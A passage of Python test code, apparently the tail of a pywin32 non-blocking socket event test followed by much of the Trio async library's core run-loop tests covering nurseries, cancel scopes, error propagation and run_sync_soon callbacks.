win32file.FD_CONNECT |
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
err = client.connect_ex(port.getsockname())
self.assertEquals(err, win32file.WSAEWOULDBLOCK)
res = win32event.WaitForSingleObject(port_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(port, port_event)
self.assertEquals(events, {win32file.FD_ACCEPT: 0})
server, addr = port.accept()
server.setblocking(0)
server_event = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(server, server_event,
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CONNECT: 0,
win32file.FD_WRITE: 0})
sent = 0
data = str2bytes("x") * 16 * 1024
while sent < 16 * 1024 * 1024:
try:
sent += client.send(data)
except socket.error as e:
if e.args[0] == win32file.WSAEINTR:
continue
elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS):
break
else:
raise
else:
self.fail("could not find socket buffer limit")
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_READ: 0})
received = 0
while received < sent:
try:
received += len(server.recv(16 * 1024))
except socket.error as e:
if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]:
continue
else:
raise
self.assertEquals(received, sent)
events = win32file.WSAEnumNetworkEvents(server)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
client.shutdown(socket.SHUT_WR)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
# strange timing issues...
for i in range(5):
events = win32file.WSAEnumNetworkEvents(server, server_event)
if events: break
win32api.Sleep(100)
else:
raise AssertionError("failed to get events")
self.assertEquals(events, {win32file.FD_CLOSE: 0})
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
server.close()
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CLOSE: 0})
client.close()
events = win32file.WSAEnumNetworkEvents(port)
self.assertEquals(events, {})
if __name__ == '__main__':
testmain()
|
test_run.py
|
import contextvars
import functools
import platform
import sys
import threading
import time
import types
import warnings
from contextlib import contextmanager, ExitStack
from math import inf
from textwrap import dedent
import gc
import attr
import outcome
import sniffio
import pytest
from .tutil import (
slow,
check_sequence_matches,
gc_collect_harder,
ignore_coroutine_never_awaited_warnings,
buggy_pypy_asyncgens,
)
from ... import _core
from .._run import DEADLINE_HEAP_MIN_PRUNE_THRESHOLD
from ..._threads import to_thread_run_sync
from ..._timeouts import sleep, fail_after
from ...testing import (
wait_all_tasks_blocked,
Sequencer,
assert_checkpoints,
)
# slightly different from _timeouts.sleep_forever because it returns the value
# its rescheduled with, which is really only useful for tests of
# rescheduling...
async def sleep_forever():
return await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
def test_basic():
async def trivial(x):
return x
assert _core.run(trivial, 8) == 8
with pytest.raises(TypeError):
# Missing an argument
_core.run(trivial)
with pytest.raises(TypeError):
# Not an async function
_core.run(lambda: None)
async def trivial2(x):
await _core.checkpoint()
return x
assert _core.run(trivial2, 1) == 1
def test_initial_task_error():
async def main(x):
raise ValueError(x)
with pytest.raises(ValueError) as excinfo:
_core.run(main, 17)
assert excinfo.value.args == (17,)
def test_run_nesting():
async def inception():
async def main(): # pragma: no cover
pass
return _core.run(main)
with pytest.raises(RuntimeError) as excinfo:
_core.run(inception)
assert "from inside" in str(excinfo.value)
async def test_nursery_warn_use_async_with():
with pytest.raises(RuntimeError) as excinfo:
on = _core.open_nursery()
with on:
pass # pragma: no cover
excinfo.match(
r"use 'async with open_nursery\(...\)', not 'with open_nursery\(...\)'"
)
# avoid unawaited coro.
async with on:
pass
async def test_nursery_main_block_error_basic():
exc = ValueError("whoops")
with pytest.raises(ValueError) as excinfo:
async with _core.open_nursery():
raise exc
assert excinfo.value is exc
async def test_child_crash_basic():
exc = ValueError("uh oh")
async def erroring():
raise exc
try:
# nursery.__aexit__ propagates exception from child back to parent
async with _core.open_nursery() as nursery:
nursery.start_soon(erroring)
except ValueError as e:
assert e is exc
async def test_basic_interleave():
async def looper(whoami, record):
for i in range(3):
record.append((whoami, i))
await _core.checkpoint()
record = []
async with _core.open_nursery() as nursery:
nursery.start_soon(looper, "a", record)
nursery.start_soon(looper, "b", record)
check_sequence_matches(
record, [{("a", 0), ("b", 0)}, {("a", 1), ("b", 1)}, {("a", 2), ("b", 2)}]
)
def test_task_crash_propagation():
looper_record = []
async def looper():
try:
while True:
await _core.checkpoint()
except _core.Cancelled:
print("looper cancelled")
looper_record.append("cancelled")
async def crasher():
raise ValueError("argh")
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(looper)
nursery.start_soon(crasher)
with pytest.raises(ValueError) as excinfo:
_core.run(main)
assert looper_record == ["cancelled"]
assert excinfo.value.args == ("argh",)
def test_main_and_task_both_crash():
# If main crashes and there's also a task crash, then we get both in a
# MultiError
async def crasher():
raise ValueError
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
raise KeyError
with pytest.raises(_core.MultiError) as excinfo:
_core.run(main)
print(excinfo.value)
assert {type(exc) for exc in excinfo.value.exceptions} == {
ValueError,
KeyError,
}
def test_two_child_crashes():
async def crasher(etype):
raise etype
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher, KeyError)
nursery.start_soon(crasher, ValueError)
with pytest.raises(_core.MultiError) as excinfo:
_core.run(main)
assert {type(exc) for exc in excinfo.value.exceptions} == {
ValueError,
KeyError,
}
async def test_child_crash_wakes_parent():
async def crasher():
raise ValueError
with pytest.raises(ValueError):
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
await sleep_forever()
async def test_reschedule():
t1 = None
t2 = None
async def child1():
nonlocal t1, t2
t1 = _core.current_task()
print("child1 start")
x = await sleep_forever()
print("child1 woke")
assert x == 0
print("child1 rescheduling t2")
_core.reschedule(t2, outcome.Error(ValueError()))
print("child1 exit")
async def child2():
nonlocal t1, t2
print("child2 start")
t2 = _core.current_task()
_core.reschedule(t1, outcome.Value(0))
print("child2 sleep")
with pytest.raises(ValueError):
await sleep_forever()
print("child2 successful exit")
async with _core.open_nursery() as nursery:
nursery.start_soon(child1)
# let t1 run and fall asleep
await _core.checkpoint()
nursery.start_soon(child2)
async def test_current_time():
t1 = _core.current_time()
# Windows clock is pretty low-resolution -- appveyor tests fail unless we
# sleep for a bit here.
time.sleep(time.get_clock_info("perf_counter").resolution)
t2 = _core.current_time()
assert t1 < t2
async def test_current_time_with_mock_clock(mock_clock):
start = mock_clock.current_time()
assert mock_clock.current_time() == _core.current_time()
assert mock_clock.current_time() == _core.current_time()
mock_clock.jump(3.14)
assert start + 3.14 == mock_clock.current_time() == _core.current_time()
async def test_current_clock(mock_clock):
assert mock_clock is _core.current_clock()
async def test_current_task():
parent_task = _core.current_task()
async def child():
assert _core.current_task().parent_nursery.parent_task is parent_task
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
async def test_root_task():
root = _core.current_root_task()
assert root.parent_nursery is root.eventual_parent_nursery is None
def test_out_of_context():
with pytest.raises(RuntimeError):
_core.current_task()
with pytest.raises(RuntimeError):
_core.current_time()
async def test_current_statistics(mock_clock):
# Make sure all the early startup stuff has settled down
await wait_all_tasks_blocked()
# A child that sticks around to make some interesting stats:
async def child():
try:
await sleep_forever()
except _core.Cancelled:
pass
stats = _core.current_statistics()
print(stats)
# 2 system tasks + us
assert stats.tasks_living == 3
assert stats.run_sync_soon_queue_size == 0
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
token = _core.current_trio_token()
token.run_sync_soon(lambda: None)
token.run_sync_soon(lambda: None, idempotent=True)
stats = _core.current_statistics()
print(stats)
# 2 system tasks + us + child
assert stats.tasks_living == 4
# the exact value here might shift if we change how we do accounting
# (currently it only counts tasks that we already know will be
# runnable on the next pass), but still useful to at least test the
# difference between now and after we wake up the child:
assert stats.tasks_runnable == 0
assert stats.run_sync_soon_queue_size == 2
nursery.cancel_scope.cancel()
stats = _core.current_statistics()
print(stats)
assert stats.tasks_runnable == 1
# Give the child a chance to die and the run_sync_soon a chance to clear
await _core.checkpoint()
await _core.checkpoint()
with _core.CancelScope(deadline=_core.current_time() + 5):
stats = _core.current_statistics()
print(stats)
assert stats.seconds_to_next_deadline == 5
stats = _core.current_statistics()
print(stats)
assert stats.seconds_to_next_deadline == inf
async def test_cancel_scope_repr(mock_clock):
scope = _core.CancelScope()
assert "unbound" in repr(scope)
with scope:
assert "active" in repr(scope)
scope.deadline = _core.current_time() - 1
assert "deadline is 1.00 seconds ago" in repr(scope)
scope.deadline = _core.current_time() + 10
assert "deadline is 10.00 seconds from now" in repr(scope)
# when not in async context, can't get the current time
assert "deadline" not in await to_thread_run_sync(repr, scope)
scope.cancel()
assert "cancelled" in repr(scope)
assert "exited" in repr(scope)
def test_cancel_points():
async def main1():
with _core.CancelScope() as scope:
await _core.checkpoint_if_cancelled()
scope.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint_if_cancelled()
_core.run(main1)
async def main2():
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
_core.run(main2)
async def main3():
with _core.CancelScope() as scope:
scope.cancel()
with pytest.raises(_core.Cancelled):
await sleep_forever()
_core.run(main3)
async def main4():
with _core.CancelScope() as scope:
scope.cancel()
await _core.cancel_shielded_checkpoint()
await _core.cancel_shielded_checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
_core.run(main4)
async def test_cancel_edge_cases():
with _core.CancelScope() as scope:
# Two cancels in a row -- idempotent
scope.cancel()
scope.cancel()
await _core.checkpoint()
assert scope.cancel_called
assert scope.cancelled_caught
with _core.CancelScope() as scope:
# Check level-triggering
scope.cancel()
with pytest.raises(_core.Cancelled):
await sleep_forever()
with pytest.raises(_core.Cancelled):
await sleep_forever()
async def test_cancel_scope_multierror_filtering():
async def crasher():
raise KeyError
try:
with _core.CancelScope() as outer:
try:
async with _core.open_nursery() as nursery:
# Two children that get cancelled by the nursery scope
nursery.start_soon(sleep_forever) # t1
nursery.start_soon(sleep_forever) # t2
nursery.cancel_scope.cancel()
with _core.CancelScope(shield=True):
await wait_all_tasks_blocked()
# One child that gets cancelled by the outer scope
nursery.start_soon(sleep_forever) # t3
outer.cancel()
# And one that raises a different error
nursery.start_soon(crasher) # t4
# and then our __aexit__ also receives an outer Cancelled
except _core.MultiError as multi_exc:
# Since the outer scope became cancelled before the
# nursery block exited, all cancellations inside the
# nursery block continue propagating to reach the
# outer scope.
assert len(multi_exc.exceptions) == 5
summary = {}
for exc in multi_exc.exceptions:
summary.setdefault(type(exc), 0)
summary[type(exc)] += 1
assert summary == {_core.Cancelled: 4, KeyError: 1}
raise
except AssertionError: # pragma: no cover
raise
except BaseException as exc:
# This is ouside the outer scope, so all the Cancelled
# exceptions should have been absorbed, leaving just a regular
# KeyError from crasher()
assert type(exc) is KeyError
else: # pragma: no cover
assert False
async def test_precancelled_task():
# a task that gets spawned into an already-cancelled nursery should begin
# execution (https://github.com/python-trio/trio/issues/41), but get a
# cancelled error at its first blocking call.
record = []
async def blocker():
record.append("started")
await sleep_forever()
async with _core.open_nursery() as nursery:
nursery.cancel_scope.cancel()
nursery.start_soon(blocker)
assert record == ["started"]
async def test_cancel_shielding():
with _core.CancelScope() as outer:
with _core.CancelScope() as inner:
await _core.checkpoint()
outer.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
assert inner.shield is False
with pytest.raises(TypeError):
inner.shield = "hello"
assert inner.shield is False
inner.shield = True
assert inner.shield is True
# shield protects us from 'outer'
await _core.checkpoint()
with _core.CancelScope() as innerest:
innerest.cancel()
# but it doesn't protect us from scope inside inner
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
await _core.checkpoint()
inner.shield = False
# can disable shield again
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# re-enable shield
inner.shield = True
await _core.checkpoint()
# shield doesn't protect us from inner itself
inner.cancel()
# This should now raise, but be absorbed by the inner scope
await _core.checkpoint()
assert inner.cancelled_caught
# make sure that cancellation propagates immediately to all children
async def test_cancel_inheritance():
record = set()
async def leaf(ident):
try:
await sleep_forever()
except _core.Cancelled:
record.add(ident)
async def worker(ident):
async with _core.open_nursery() as nursery:
nursery.start_soon(leaf, ident + "-l1")
nursery.start_soon(leaf, ident + "-l2")
async with _core.open_nursery() as nursery:
nursery.start_soon(worker, "w1")
nursery.start_soon(worker, "w2")
nursery.cancel_scope.cancel()
assert record == {"w1-l1", "w1-l2", "w2-l1", "w2-l2"}
async def test_cancel_shield_abort():
with _core.CancelScope() as outer:
async with _core.open_nursery() as nursery:
outer.cancel()
nursery.cancel_scope.shield = True
# The outer scope is cancelled, but this task is protected by the
# shield, so it manages to get to sleep
record = []
async def sleeper():
record.append("sleeping")
try:
await sleep_forever()
except _core.Cancelled:
record.append("cancelled")
nursery.start_soon(sleeper)
await wait_all_tasks_blocked()
assert record == ["sleeping"]
# now when we unshield, it should abort the sleep.
nursery.cancel_scope.shield = False
# wait for the task to finish before entering the nursery
# __aexit__, because __aexit__ could make it spuriously look like
# this worked by cancelling the nursery scope. (When originally
# written, without these last few lines, the test spuriously
# passed, even though shield assignment was buggy.)
with _core.CancelScope(shield=True):
await wait_all_tasks_blocked()
assert record == ["sleeping", "cancelled"]
async def test_basic_timeout(mock_clock):
start = _core.current_time()
with _core.CancelScope() as scope:
assert scope.deadline == inf
scope.deadline = start + 1
assert scope.deadline == start + 1
assert not scope.cancel_called
mock_clock.jump(2)
await _core.checkpoint()
await _core.checkpoint()
await _core.checkpoint()
assert not scope.cancel_called
start = _core.current_time()
with _core.CancelScope(deadline=start + 1) as scope:
mock_clock.jump(2)
await sleep_forever()
# But then the scope swallowed the exception... but we can still see it
# here:
assert scope.cancel_called
assert scope.cancelled_caught
# changing deadline
start = _core.current_time()
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.deadline = start + 10
await _core.checkpoint()
mock_clock.jump(5)
await _core.checkpoint()
scope.deadline = start + 1
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
async def test_cancel_scope_nesting():
# Nested scopes: if two triggering at once, the outer one wins
with _core.CancelScope() as scope1:
with _core.CancelScope() as scope2:
with _core.CancelScope() as scope3:
scope3.cancel()
scope2.cancel()
await sleep_forever()
assert scope3.cancel_called
assert not scope3.cancelled_caught
assert scope2.cancel_called
assert scope2.cancelled_caught
assert not scope1.cancel_called
assert not scope1.cancelled_caught
# shielding
with _core.CancelScope() as scope1:
with _core.CancelScope() as scope2:
scope1.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
scope2.shield = True
await _core.checkpoint()
scope2.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# if a scope is pending, but then gets popped off the stack, then it
# isn't delivered
with _core.CancelScope() as scope:
scope.cancel()
await _core.cancel_shielded_checkpoint()
await _core.checkpoint()
assert not scope.cancelled_caught
# Regression test for https://github.com/python-trio/trio/issues/1175
async def test_unshield_while_cancel_propagating():
with _core.CancelScope() as outer:
with _core.CancelScope() as inner:
outer.cancel()
try:
await _core.checkpoint()
finally:
inner.shield = True
assert outer.cancelled_caught and not inner.cancelled_caught
async def test_cancel_unbound():
async def sleep_until_cancelled(scope):
with scope, fail_after(1):
await sleep_forever()
# Cancel before entry
scope = _core.CancelScope()
scope.cancel()
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_until_cancelled, scope)
# Cancel after entry
scope = _core.CancelScope()
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_until_cancelled, scope)
await wait_all_tasks_blocked()
scope.cancel()
# Shield before entry
scope = _core.CancelScope()
scope.shield = True
with _core.CancelScope() as outer, scope:
outer.cancel()
await _core.checkpoint()
scope.shield = False
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# Can't reuse
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.cancel()
await _core.checkpoint()
assert scope.cancel_called
assert not scope.cancelled_caught
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
# Can't reenter
with _core.CancelScope() as scope:
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
# Can't enter from multiple tasks simultaneously
scope = _core.CancelScope()
async def enter_scope():
with scope:
await sleep_forever()
async with _core.open_nursery() as nursery:
nursery.start_soon(enter_scope, name="this one")
await wait_all_tasks_blocked()
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
nursery.cancel_scope.cancel()
# If not yet entered, cancel_called is true when the deadline has passed
# even if cancel() hasn't been called yet
scope = _core.CancelScope(deadline=_core.current_time() + 1)
assert not scope.cancel_called
scope.deadline -= 1
assert scope.cancel_called
scope.deadline += 1
assert scope.cancel_called # never become un-cancelled
async def test_cancel_scope_misnesting():
outer = _core.CancelScope()
inner = _core.CancelScope()
with ExitStack() as stack:
stack.enter_context(outer)
with inner:
with pytest.raises(RuntimeError, match="still within its child"):
stack.close()
# No further error is raised when exiting the inner context
# If there are other tasks inside the abandoned part of the cancel tree,
# they get cancelled when the misnesting is detected
async def task1():
with pytest.raises(_core.Cancelled):
await sleep_forever()
# Even if inside another cancel scope
async def task2():
with _core.CancelScope():
with pytest.raises(_core.Cancelled):
await sleep_forever()
with ExitStack() as stack:
stack.enter_context(_core.CancelScope())
async with _core.open_nursery() as nursery:
nursery.start_soon(task1)
nursery.start_soon(task2)
await wait_all_tasks_blocked()
with pytest.raises(RuntimeError, match="still within its child"):
stack.close()
# Variant that makes the child tasks direct children of the scope
# that noticed the misnesting:
nursery_mgr = _core.open_nursery()
nursery = await nursery_mgr.__aenter__()
try:
nursery.start_soon(task1)
nursery.start_soon(task2)
nursery.start_soon(sleep_forever)
await wait_all_tasks_blocked()
nursery.cancel_scope.__exit__(None, None, None)
finally:
with pytest.raises(RuntimeError) as exc_info:
await nursery_mgr.__aexit__(*sys.exc_info())
assert "which had already been exited" in str(exc_info.value)
assert type(exc_info.value.__context__) is _core.MultiError
assert len(exc_info.value.__context__.exceptions) == 3
cancelled_in_context = False
for exc in exc_info.value.__context__.exceptions:
assert isinstance(exc, RuntimeError)
assert "closed before the task exited" in str(exc)
cancelled_in_context |= isinstance(exc.__context__, _core.Cancelled)
assert cancelled_in_context # for the sleep_forever
# Trying to exit a cancel scope from an unrelated task raises an error
# without affecting any state
async def task3(task_status):
with _core.CancelScope() as scope:
task_status.started(scope)
await sleep_forever()
async with _core.open_nursery() as nursery:
scope = await nursery.start(task3)
with pytest.raises(RuntimeError, match="from unrelated"):
scope.__exit__(None, None, None)
scope.cancel()
@slow
async def test_timekeeping():
# probably a good idea to use a real clock for *one* test anyway...
TARGET = 1.0
# give it a few tries in case of random CI server flakiness
for _ in range(4):
real_start = time.perf_counter()
with _core.CancelScope() as scope:
scope.deadline = _core.current_time() + TARGET
await sleep_forever()
real_duration = time.perf_counter() - real_start
accuracy = real_duration / TARGET
print(accuracy)
# Actual time elapsed should always be >= target time
# (== is possible depending on system behavior for time.perf_counter resolution
if 1.0 <= accuracy < 2: # pragma: no branch
break
else: # pragma: no cover
assert False
async def test_failed_abort():
stubborn_task = [None]
stubborn_scope = [None]
record = []
async def stubborn_sleeper():
stubborn_task[0] = _core.current_task()
with _core.CancelScope() as scope:
stubborn_scope[0] = scope
record.append("sleep")
x = await _core.wait_task_rescheduled(lambda _: _core.Abort.FAILED)
assert x == 1
record.append("woke")
try:
await _core.checkpoint_if_cancelled()
except _core.Cancelled:
record.append("cancelled")
async with _core.open_nursery() as nursery:
nursery.start_soon(stubborn_sleeper)
await wait_all_tasks_blocked()
assert record == ["sleep"]
stubborn_scope[0].cancel()
await wait_all_tasks_blocked()
# cancel didn't wake it up
assert record == ["sleep"]
# wake it up again by hand
_core.reschedule(stubborn_task[0], outcome.Value(1))
assert record == ["sleep", "woke", "cancelled"]
def test_broken_abort():
async def main():
# These yields are here to work around an annoying warning -- we're
# going to crash the main loop, and if we (by chance) do this before
# the run_sync_soon task runs for the first time, then Python gives us
# a spurious warning about it not being awaited. (I mean, the warning
# is correct, but here we're testing our ability to deliver a
# semi-meaningful error after things have gone totally pear-shaped, so
# it's not relevant.) By letting the run_sync_soon_task run first, we
# avoid the warning.
await _core.checkpoint()
await _core.checkpoint()
with _core.CancelScope() as scope:
scope.cancel()
# None is not a legal return value here
await _core.wait_task_rescheduled(lambda _: None)
with pytest.raises(_core.TrioInternalError):
_core.run(main)
# Because this crashes, various __del__ methods print complaints on
# stderr. Make sure that they get run now, so the output is attached to
# this test.
gc_collect_harder()
def test_error_in_run_loop():
# Blow stuff up real good to check we at least get a TrioInternalError
async def main():
task = _core.current_task()
task._schedule_points = "hello!"
await _core.checkpoint()
with ignore_coroutine_never_awaited_warnings():
with pytest.raises(_core.TrioInternalError):
_core.run(main)
async def test_spawn_system_task():
record = []
async def system_task(x):
record.append(("x", x))
record.append(("ki", _core.currently_ki_protected()))
await _core.checkpoint()
_core.spawn_system_task(system_task, 1)
await wait_all_tasks_blocked()
assert record == [("x", 1), ("ki", True)]
# intentionally make a system task crash
def test_system_task_crash():
async def crasher():
raise KeyError
async def main():
_core.spawn_system_task(crasher)
await sleep_forever()
with pytest.raises(_core.TrioInternalError):
_core.run(main)
def test_system_task_crash_MultiError():
async def crasher1():
raise KeyError
async def crasher2():
raise ValueError
async def system_task():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher1)
nursery.start_soon(crasher2)
async def main():
_core.spawn_system_task(system_task)
await sleep_forever()
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
me = excinfo.value.__cause__
assert isinstance(me, _core.MultiError)
assert len(me.exceptions) == 2
for exc in me.exceptions:
assert isinstance(exc, (KeyError, ValueError))
def test_system_task_crash_plus_Cancelled():
# Set up a situation where a system task crashes with a
# MultiError([Cancelled, ValueError])
async def crasher():
try:
await sleep_forever()
except _core.Cancelled:
raise ValueError
async def cancelme():
await sleep_forever()
async def system_task():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
nursery.start_soon(cancelme)
async def main():
_core.spawn_system_task(system_task)
# then we exit, triggering a cancellation
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is ValueError
def test_system_task_crash_KeyboardInterrupt():
async def ki():
raise KeyboardInterrupt
async def main():
_core.spawn_system_task(ki)
await sleep_forever()
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert isinstance(excinfo.value.__cause__, KeyboardInterrupt)
# This used to fail because checkpoint was a yield followed by an immediate
# reschedule. So we had:
# 1) this task yields
# 2) this task is rescheduled
# ...
# 3) next iteration of event loop starts, runs timeouts
# 4) this task has timed out
# 5) ...but it's on the run queue, so the timeout is queued to be delivered
# the next time that it's blocked.
async def test_yield_briefly_checks_for_timeout(mock_clock):
with _core.CancelScope(deadline=_core.current_time() + 5):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
mock_clock.jump(10)
await _core.checkpoint()
# This tests that sys.exc_info is properly saved/restored as we swap between
# tasks. It turns out that the interpreter automagically handles this for us
# so there's no special code in Trio required to pass this test, but it's
# still nice to know that it works :-).
#
# Update: it turns out I was right to be nervous! see the next test...
async def test_exc_info():
record = []
seq = Sequencer()
async def child1():
with pytest.raises(ValueError) as excinfo:
try:
async with seq(0):
pass # we don't yield until seq(2) below
record.append("child1 raise")
raise ValueError("child1")
except ValueError:
record.append("child1 sleep")
async with seq(2):
pass
assert "child2 wake" in record
record.append("child1 re-raise")
raise
assert excinfo.value.__context__ is None
record.append("child1 success")
async def child2():
with pytest.raises(KeyError) as excinfo:
async with seq(1):
pass # we don't yield until seq(3) below
assert "child1 sleep" in record
record.append("child2 wake")
assert sys.exc_info() == (None, None, None)
try:
raise KeyError("child2")
except KeyError:
record.append("child2 sleep again")
async with seq(3):
pass
assert "child1 re-raise" in record
record.append("child2 re-raise")
raise
assert excinfo.value.__context__ is None
record.append("child2 success")
async with _core.open_nursery() as nursery:
nursery.start_soon(child1)
nursery.start_soon(child2)
assert record == [
"child1 raise",
"child1 sleep",
"child2 wake",
"child2 sleep again",
"child1 re-raise",
"child1 success",
"child2 re-raise",
"child2 success",
]
# At least as of CPython 3.6, using .throw() to raise an exception inside a
# coroutine/generator causes the original exc_info state to be lost, so things
# like re-raising and exception chaining are broken.
#
# https://bugs.python.org/issue29587
async def test_exc_info_after_yield_error():
child_task = None
async def child():
nonlocal child_task
child_task = _core.current_task()
try:
raise KeyError
except Exception:
try:
await sleep_forever()
except Exception:
pass
raise
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
_core.reschedule(child_task, outcome.Error(ValueError()))
# Similar to previous test -- if the ValueError() gets sent in via 'throw',
# then Python's normal implicit chaining stuff is broken.
async def test_exception_chaining_after_yield_error():
child_task = None
async def child():
nonlocal child_task
child_task = _core.current_task()
try:
raise KeyError
except Exception:
await sleep_forever()
with pytest.raises(ValueError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
_core.reschedule(child_task, outcome.Error(ValueError()))
assert isinstance(excinfo.value.__context__, KeyError)
async def test_nursery_exception_chaining_doesnt_make_context_loops():
async def crasher():
raise KeyError
with pytest.raises(_core.MultiError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
raise ValueError
# the MultiError should not have the KeyError or ValueError as context
assert excinfo.value.__context__ is None
def test_TrioToken_identity():
async def get_and_check_token():
token = _core.current_trio_token()
# Two calls in the same run give the same object
assert token is _core.current_trio_token()
return token
t1 = _core.run(get_and_check_token)
t2 = _core.run(get_and_check_token)
assert t1 is not t2
assert t1 != t2
assert hash(t1) != hash(t2)
async def test_TrioToken_run_sync_soon_basic():
record = []
def cb(x):
record.append(("cb", x))
token = _core.current_trio_token()
token.run_sync_soon(cb, 1)
assert not record
await wait_all_tasks_blocked()
assert record == [("cb", 1)]
def test_TrioToken_run_sync_soon_too_late():
token = None
async def main():
nonlocal token
token = _core.current_trio_token()
_core.run(main)
assert token is not None
with pytest.raises(_core.RunFinishedError):
token.run_sync_soon(lambda: None) # pragma: no branch
async def test_TrioToken_run_sync_soon_idempotent():
record = []
def cb(x):
record.append(x)
token = _core.current_trio_token()
token.run_sync_soon(cb, 1)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 2, idempotent=True)
token.run_sync_soon(cb, 2, idempotent=True)
await wait_all_tasks_blocked()
assert len(record) == 3
assert sorted(record) == [1, 1, 2]
# ordering test
record = []
for _ in range(3):
for i in range(100):
token.run_sync_soon(cb, i, idempotent=True)
await wait_all_tasks_blocked()
# We guarantee FIFO
assert record == list(range(100))
def test_TrioToken_run_sync_soon_idempotent_requeue():
# We guarantee that if a call has finished, queueing it again will call it
# again. Due to the lack of synchronization, this effectively means that
# we have to guarantee that once a call has *started*, queueing it again
# will call it again. Also this is much easier to test :-)
record = []
def redo(token):
record.append(None)
try:
token.run_sync_soon(redo, token, idempotent=True)
except _core.RunFinishedError:
pass
async def main():
token = _core.current_trio_token()
token.run_sync_soon(redo, token, idempotent=True)
await _core.checkpoint()
await _core.checkpoint()
await _core.checkpoint()
_core.run(main)
assert len(record) >= 2
def test_TrioToken_run_sync_soon_after_main_crash():
record = []
async def main():
token = _core.current_trio_token()
# After main exits but before finally cleaning up, callback processed
# normally
token.run_sync_soon(lambda: record.append("sync-cb"))
raise ValueError
with pytest.raises(ValueError):
_core.run(main)
assert record == ["sync-cb"]
def test_TrioToken_run_sync_soon_crashes():
record = set()
async def main():
token = _core.current_trio_token()
token.run_sync_soon(lambda: dict()["nope"])
# check that a crashing run_sync_soon callback doesn't stop further
# calls to run_sync_soon
token.run_sync_soon(lambda: record.add("2nd run_sync_soon ran"))
try:
await sleep_forever()
except _core.Cancelled:
record.add("cancelled!")
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is KeyError
assert record == {"2nd run_sync_soon ran", "cancelled!"}
async def test_TrioToken_run_sync_soon_FIFO():
N = 100
record = []
token = _core.current_trio_token()
for i in range(N):
token.run_sync_soon(lambda j: record.append(j), i)
await wait_all_tasks_blocked()
assert record == list(range(N))
def test_TrioToken_run_sync_soon_starvation_resistance():
# Even if we push callbacks in from callbacks, so that the callback queue
# never empties out, then we still can't starve out other tasks from
# running.
token = None
record = []
def naughty_cb(i):
nonlocal token
try:
token.run_sync_soon(naughty_cb, i + 1)
